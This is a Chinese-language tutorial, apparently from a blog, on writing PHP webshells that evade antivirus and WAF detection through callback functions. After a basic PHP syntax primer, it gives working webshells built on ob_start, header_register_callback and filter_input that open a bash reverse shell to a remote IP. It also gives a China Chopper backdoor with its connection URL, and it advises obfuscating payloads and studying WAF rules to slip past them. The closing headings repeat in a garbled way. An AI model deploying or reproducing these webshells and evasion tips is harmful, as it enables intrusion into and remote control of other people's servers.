PHP WebShell免杀基础教程：回调函数技术<\/h1>

一、PHP基础语法速通<\/h2>

1. 变量声明与赋值<\/h3>

$variable_name =<\/span> value<\/span>;  \/\/ PHP变量以$开头
<\/span><\/span><\/span><\/code><\/pre>2. 数据类型<\/h3>

整数(int)<\/li>
浮点数(float)<\/li>
字符串(string)<\/li>
布尔值(boolean)<\/li>
数组(array)<\/li>
对象(object)<\/li>
空值(null)<\/li>
<\/ul>
3. 字符串操作<\/h3>
$string1 =<\/span> "Hello"<\/span>;
<\/span><\/span>$string2 =<\/span> "World"<\/span>;
<\/span><\/span>echo<\/span> $string1 .<\/span> $string2;  \/\/ 输出: Hello World
<\/span><\/span><\/span><\/code><\/pre>4. 条件语句<\/h3>
if<\/span> (condition<\/span>) {
<\/span><\/span>    \/\/ 条件为真时执行的代码
<\/span><\/span><\/span><\/span>} elseif<\/span> (another_condition<\/span>) {
<\/span><\/span>    \/\/ 如果第一个条件为假且这个条件为真时执行的代码
<\/span><\/span><\/span><\/span>} else<\/span> {
<\/span><\/span>    \/\/ 如果上述条件都不满足时执行的代码
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>5. 循环语句<\/h3>
for循环<\/h4>
for<\/span> ($i =<\/span> 0<\/span>; $i <<\/span> 5<\/span>; $i++<\/span>) {
<\/span><\/span>    echo<\/span> "Number: <\/span>$i<\/span> <br>"<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>while循环<\/h4>
$count =<\/span> 0<\/span>;
<\/span><\/span>while<\/span> ($count <<\/span> 3<\/span>) {
<\/span><\/span>    echo<\/span> "Count: <\/span>$count<\/span> <br>"<\/span>;
<\/span><\/span>    $count++<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>foreach循环<\/h4>
$fruits =<\/span> array<\/span>("Apple"<\/span>, "Banana"<\/span>, "Orange"<\/span>);
<\/span><\/span>foreach<\/span> ($fruits as<\/span> $fruit) {
<\/span><\/span>    echo<\/span> "<\/span>$fruit<\/span> <br>"<\/span>;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>\/\/ 关联数组遍历
<\/span><\/span><\/span><\/span>$person =<\/span> array<\/span>("name"<\/span> =><\/span> "John"<\/span>, "age"<\/span> =><\/span> 30<\/span>, "city"<\/span> =><\/span> "New York"<\/span>);
<\/span><\/span>foreach<\/span> ($person as<\/span> $key =><\/span> $value) {
<\/span><\/span>    echo<\/span> "<\/span>$key<\/span>: <\/span>$value<\/span> <br>"<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>6. 函数定义与调用<\/h3>
function<\/span> functionName<\/span>($param1, $param2) {
<\/span><\/span>    \/\/ 函数体
<\/span><\/span><\/span><\/span>    return<\/span> $result;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>\/\/ 调用函数
<\/span><\/span><\/span><\/span>$result =<\/span> functionName<\/span>($arg1, $arg2);
<\/span><\/span><\/code><\/pre>7. 数组操作<\/h3>
$array =<\/span> array<\/span>("apple"<\/span>, "banana"<\/span>, "orange"<\/span>);
<\/span><\/span>echo<\/span> $array[0<\/span>];  \/\/ 输出: apple
<\/span><\/span><\/span><\/span>
<\/span><\/span>\/\/ 关联数组
<\/span><\/span><\/span><\/span>$assoc_array =<\/span> array<\/span>("name"<\/span> =><\/span> "John"<\/span>, "age"<\/span> =><\/span> 30<\/span>);
<\/span><\/span>echo<\/span> $assoc_array["name"<\/span>];  \/\/ 输出: John
<\/span><\/span><\/span><\/code><\/pre>8. 超级全局变量<\/h3>

$_GET<\/code> - 获取GET参数<\/li>
$_POST<\/code> - 获取POST参数<\/li>
$_SESSION<\/code> - 会话变量<\/li>
$_COOKIE<\/code> - Cookie变量<\/li>
$_SERVER<\/code> - 服务器和执行环境信息<\/li>
<\/ul>
9. 包含文件<\/h3>
include<\/span> 'filename.php'<\/span>;
<\/span><\/span>require<\/span> 'filename.php'<\/span>;  \/\/ 如果文件不存在会引发致命错误
<\/span><\/span><\/span><\/code><\/pre>10. 错误处理<\/h3>
try<\/span> {
<\/span><\/span>    \/\/ 可能引发异常的代码
<\/span><\/span><\/span><\/span>} catch<\/span> (Exception<\/span> $e) {
<\/span><\/span>    \/\/ 异常处理代码
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>二、回调函数免杀技术<\/h2>
1. ob_start回调<\/h3>
函数功能<\/strong>：输出缓冲是PHP中的一种机制，允许在将输出发送到浏览器之前捕获由PHP脚本生成的输出。<\/p>
示例<\/strong>：<\/p>
<?<\/span>php<\/span> 
<\/span><\/span>function<\/span> a<\/span>($b){
<\/span><\/span>    exec<\/span>('\/bin\/bash -c "bash -i >& \/dev\/tcp\/8.8.8.8\/8888 0>&1"'<\/span>);
<\/span><\/span>}
<\/span><\/span>ob_start<\/span>("a"<\/span>);
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>2. header_register_callback回调<\/h3>
函数功能<\/strong>：当PHP发送HTTP标头时，该回调函数将会被调用。<\/p>
示例<\/strong>：<\/p>
<?<\/span>php<\/span> 
<\/span><\/span>function<\/span> a<\/span>($b){ 
<\/span><\/span>    exec<\/span>('\/bin\/bash -c "bash -i >& \/dev\/tcp\/8.8.8.8\/8888 0>&1"'<\/span>); 
<\/span><\/span>} 
<\/span><\/span>header_register_callback<\/span>("a"<\/span>); 
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>3. filter_input回调<\/h3>
函数功能<\/strong>：获取输入变量并过滤它的值的函数。<\/p>
反弹Shell示例<\/strong>：<\/p>
<?<\/span>php<\/span> 
<\/span><\/span>function<\/span> a<\/span>($value){ 
<\/span><\/span>    exec<\/span>('\/bin\/bash -c "bash -i >& \/dev\/tcp\/8.8.8.8\/8888 0>&1"'<\/span>); 
<\/span><\/span>} 
<\/span><\/span>filter_input<\/span>(INPUT_POST<\/span>, 'c'<\/span>, FILTER_CALLBACK<\/span>, array<\/span>('options'<\/span> =><\/span> 'a'<\/span>)); 
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>中国菜刀连接示例<\/strong>：<\/p>
<?<\/span>php<\/span> 
<\/span><\/span>function<\/span> a<\/span>($c){ 
<\/span><\/span>    $c($_GET['d'<\/span>]); 
<\/span><\/span>} 
<\/span><\/span>filter_input<\/span>(INPUT_GET<\/span>,'c'<\/span>, FILTER_CALLBACK<\/span>,array<\/span>('options'<\/span>=><\/span>'a'<\/span>)); 
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>使用方式：<\/p>
http:\/\/127.0.0.1\/index.php?&c=assert&d=eval($_POST['c'])
密码为c
<\/code><\/pre>
三、注意事项<\/h2>

回调函数技术已被WAF重点关注，实际应用中需要结合其他免杀技术<\/li>
示例中的反弹Shell命令需要根据实际情况修改IP和端口<\/li>
中国菜刀连接方式在现代环境中可能已被安全设备识别<\/li>
建议在实际使用前进行充分的测试和变形<\/li>
<\/ol>
四、扩展思路<\/h2>

可以收集更多PHP回调函数进行测试<\/li>
结合编码、混淆等技术提高免杀效果<\/li>
研究WAF对回调函数的检测规则，针对性绕过<\/li>
考虑使用不常见的回调函数组合<\/li>
<\/ol>

PHP WebShell免杀基础教程：回调函数技术<\/h1>

一、PHP基础语法速通<\/h2>

5. 循环语句<\/h3>

二、回调函数免杀技术<\/h2>

四、扩展思路<\/h2> 可以收集更多PHP回调函数进行测试<\/li> 结合编码、混淆等技术提高免杀效果<\/li> 研究WAF对回调函数的检测规则，针对性绕过<\/li> 考虑使用不常见的回调函数组合<\/li> <\/ol>

四、扩展思路<\/h2>

可以收集更多PHP回调函数进行测试<\/li>
结合编码、混淆等技术提高免杀效果<\/li>
研究WAF对回调函数的检测规则，针对性绕过<\/li>
考虑使用不常见的回调函数组合<\/li> <\/ol>